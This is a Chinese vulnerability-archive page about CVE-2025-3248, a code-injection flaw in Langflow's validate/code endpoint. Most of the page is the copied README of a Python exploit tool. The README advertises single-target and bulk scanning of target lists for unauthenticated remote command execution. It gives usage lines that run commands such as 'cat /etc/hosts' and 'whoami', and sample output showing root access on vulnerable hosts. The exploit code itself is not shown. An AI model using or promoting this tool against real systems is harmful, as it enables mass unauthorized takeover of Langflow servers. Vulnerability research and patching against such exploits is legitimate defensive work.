关联漏洞
标题:
Langflow 安全漏洞
(CVE-2025-3248)
描述:Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。 Langflow 1.3.0之前版本存在安全漏洞,该漏洞源于/api/v1/validate/code端点存在代码注入漏洞,可能导致远程未经验证的攻击者执行任意代码。
介绍
# Langflow CVE-2025-3248 Exploit
A Python-based exploit for CVE-2025-3248, which allows remote and unauthenticated attackers to execute arbitrary code on vulnerable Langflow instances through crafted HTTP requests.
## Features
- Single URL or bulk scanning from file
- Automatic vulnerability detection
- Command execution capability
- Detailed output with timing information
- Results saved to separate files for vulnerable and non-vulnerable targets
- Benchmark statistics for scan performance
## Usage
### Single URL Scan
```bash
python CVE-2025-3248.py http://target-url -c "cat /etc/hosts"
```
### Bulk Scan from File
```bash
python CVE-2025-3248.py -f targets.txt
```
### Custom Command Execution
```bash
python CVE-2025-3248.py -f targets.txt -c "whoami"
```
## Example Output
```
[*] Progress: 1/10 URLs checked
[*] Checking https://example.com
[+] Vulnerable - Command Output:
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
[*] Scan Summary:
[+] Total URLs checked: 10
[+] Vulnerable URLs: 3
[+] Not Vulnerable URLs: 7
[*] Total scan time: 25.34s
[*] Results saved to files with timestamp
```
source: https://github.com/verylazytech
文件快照
[4.0K] /data/pocs/adf3595f48ffc00759dde65769bb6d9ccfaf0b97
├── [5.8K] CVE-2025-3248.py
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。